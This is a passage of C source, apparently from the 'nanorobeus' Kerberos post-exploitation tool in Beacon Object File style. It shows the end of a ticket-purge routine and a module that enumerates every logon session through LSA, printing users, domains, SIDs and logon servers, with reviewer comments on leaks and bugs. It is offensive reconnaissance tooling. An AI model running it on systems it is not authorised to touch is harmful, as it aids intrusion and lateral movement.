                                                  sizeof(KERB_PURGE_TKT_CACHE_REQUEST), &purgeResponse, &responseSize, &protocolStatus);

    if (NT_SUCCESS(status)) {
        if (NT_SUCCESS(protocolStatus)) {
            PRINT(dispatch, "[+] Successfully purged tickets.\n");
        } else {
            PRINT(dispatch, "[!] LsaCallAuthenticationPackage ProtocolStatus %ld\n",
                  ADVAPI32$LsaNtStatusToWinError(protocolStatus));
        }
    } else {
        PRINT(dispatch, "[!] LsaCallAuthenticationPackage %ld\n", ADVAPI32$LsaNtStatusToWinError(status));
    }

    SECUR32$LsaDeregisterLogonProcess(hLsa);
}
--------------------------------------------------------------------------------
/nanorobeus/src/sessions.c:
--------------------------------------------------------------------------------
#include "sessions.h"

// Print the logon session(s) selected by luid (see GetLogonSessionData),
// separated by blank lines.  Each SECURITY_LOGON_SESSION_DATA is released
// with LsaFreeReturnBuffer and the array itself is freed afterwards.
// Requires an administrator token unless currentLuid is set.
void execute_sessions(WCHAR** dispatch, HANDLE hToken, LUID luid, BOOL currentLuid) {
    BOOL highIntegrity = IsHighIntegrity(hToken);
    if (!highIntegrity && !currentLuid) {
        PRINT(dispatch, "[!] Not in high integrity.\n");
        return;
    }

    LOGON_SESSION_DATA sessionData;
    PSECURITY_LOGON_SESSION_DATA data;
    NTSTATUS status = GetLogonSessionData(luid, &sessionData);

    if (NT_SUCCESS(status)) {
        for (int i = 0; i < sessionData.sessionCount; i++) {
            data = sessionData.sessionData[i];
            if (data != NULL) {
                PrintLogonSessionData(dispatch, *data);
                if (i != sessionData.sessionCount - 1) {
                    PRINT(dispatch, "\n\n");
                }
                SECUR32$LsaFreeReturnBuffer(data);
            }
        }
        MSVCRT$free(sessionData.sessionData);
    } else {
        PRINT(dispatch, "[!] execute_sessions GetLogonSessionData: %ld", status);
    }
}

// Fill *data with logon session records.  If luid.LowPart is non-zero a
// single record for that LUID is fetched; otherwise every session from
// LsaEnumerateLogonSessions is queried and sessions that cannot be read
// are stored as NULL.  The array is calloc'd and owned by the caller, as
// are the individual records (LsaFreeReturnBuffer).
// NOTE(review): in the enumerate path status is overwritten on every
// iteration, so a failure on the last session makes the function report
// failure even though *data was populated, and the caller then never frees
// the array.  As in GetLsaHandle, failures are returned as positive Win32
// codes, which NT_SUCCESS treats as success.
NTSTATUS GetLogonSessionData(LUID luid, LOGON_SESSION_DATA* data) {
    LOGON_SESSION_DATA sessionData;
    PSECURITY_LOGON_SESSION_DATA logonData = NULL;
    NTSTATUS status;
    if (luid.LowPart != 0) {
        status = SECUR32$LsaGetLogonSessionData(&luid, &logonData);
        if (NT_SUCCESS(status)) {
            sessionData.sessionData = MSVCRT$calloc(1, sizeof(*sessionData.sessionData));
            if (sessionData.sessionData != NULL) {
                sessionData.sessionCount = 1;
                sessionData.sessionData[0] = logonData;
                *data = sessionData;
            } else {
                status = STATUS_MEMORY_NOT_ALLOCATED;
            }
        } else {
            status = ADVAPI32$LsaNtStatusToWinError(status);
        }
    } else {
        ULONG logonSessionCount;
        PLUID logonSessionList;
        status = SECUR32$LsaEnumerateLogonSessions(&logonSessionCount, &logonSessionList);
        if (NT_SUCCESS(status)) {
            sessionData.sessionData = MSVCRT$calloc(logonSessionCount, sizeof(*sessionData.sessionData));
            if (sessionData.sessionData != NULL) {
                sessionData.sessionCount = logonSessionCount;
                for (int i = 0; i < logonSessionCount; i++) {
                    LUID luid = logonSessionList[i];
                    status = SECUR32$LsaGetLogonSessionData(&luid, &logonData);
                    if (NT_SUCCESS(status)) {
                        sessionData.sessionData[i] = logonData;
                    } else {
                        sessionData.sessionData[i] = NULL;
                    }
                }
                SECUR32$LsaFreeReturnBuffer(logonSessionList);
                *data = sessionData;
            } else {
                status = STATUS_MEMORY_NOT_ALLOCATED;
            }
        } else {
            status = ADVAPI32$LsaNtStatusToWinError(status);
        }
    }
    return status;
}

// Map a SECURITY_LOGON_TYPE / LOGON32_LOGON_* value to a printable name.
// Returns a static string; "(0)" for values not in the switch.
char* GetLogonTypeString(ULONG uLogonType) {
    char* logonType = NULL;
    switch (uLogonType) {
        case LOGON32_LOGON_INTERACTIVE:
            logonType = "Interactive";
            break;
        case LOGON32_LOGON_NETWORK:
            logonType = "Network";
            break;
        case LOGON32_LOGON_BATCH:
            logonType = "Batch";
            break;
        case LOGON32_LOGON_SERVICE:
            logonType = "Service";
            break;
        case LOGON32_LOGON_UNLOCK:
            logonType = "Unlock";
            break;
        case LOGON32_LOGON_NETWORK_CLEARTEXT:
            logonType = "Network_Cleartext";
            break;
        case LOGON32_LOGON_NEW_CREDENTIALS:
            logonType = "New_Credentials";
            break;
        default:
            logonType = "(0)";
            break;
    }
    return logonType;
}

// Print one logon session record field by field.
// NOTE(review): every GetNarrowString result and the SID string from
// ConvertSidToStringSidW (LocalFree) are leaked here.  The "%.*s"
// precision is Length / sizeof(char), i.e. the byte length of the UTF-16
// string, which is larger than the narrow string's length; harmless since
// GetNarrowString NUL-terminates, but it does not truncate anything.
void PrintLogonSessionData(WCHAR** dispatch, SECURITY_LOGON_SESSION_DATA data) {
    WCHAR* sid = NULL;
    PRINT(dispatch, "UserName : %.*s", data.UserName.Length / (int)sizeof(char),
          GetNarrowString(data.UserName.Buffer));
    PRINT(dispatch, "Domain : %.*s", data.LogonDomain.Length / (int)sizeof(char),
          GetNarrowString(data.LogonDomain.Buffer));
    PRINT(dispatch, "LogonId : %lx:0x%lx", data.LogonId.HighPart, data.LogonId.LowPart);
    PRINT(dispatch, "Session : %ld", data.Session);
    if (ADVAPI32$ConvertSidToStringSidW(data.Sid, &sid)) {
        PRINT(dispatch, "UserSID : %s", GetNarrowString(sid));
    } else {
        PRINT(dispatch, "UserSID : -");
    }
    PRINT(dispatch, "Authentication package : %.*s", data.AuthenticationPackage.Length / (int)sizeof(char),
          GetNarrowString(data.AuthenticationPackage.Buffer));
    char* logonType = GetLogonTypeString(data.LogonType);
    PRINT(dispatch, "LogonType : %s", logonType);
    SYSTEMTIME st_utc = ConvertToSystemtime(data.LogonTime);
    PRINT(dispatch, "LogonTime (UTC) : %d/%d/%d %d:%d:%d", st_utc.wDay, st_utc.wMonth, st_utc.wYear,
          st_utc.wHour, st_utc.wMinute, st_utc.wSecond);
    PRINT(dispatch, "LogonServer : %.*s", data.LogonServer.Length / (int)sizeof(char),
          GetNarrowString(data.LogonServer.Buffer));
    PRINT(dispatch, "LogonServerDNSDomain : %.*s", data.DnsDomainName.Length / (int)sizeof(char),
          GetNarrowString(data.DnsDomainName.Buffer));
    PRINT(dispatch, "UserPrincipalName : %.*s\n", data.Upn.Length / (int)sizeof(char),
          GetNarrowString(data.Upn.Buffer));
}
--------------------------------------------------------------------------------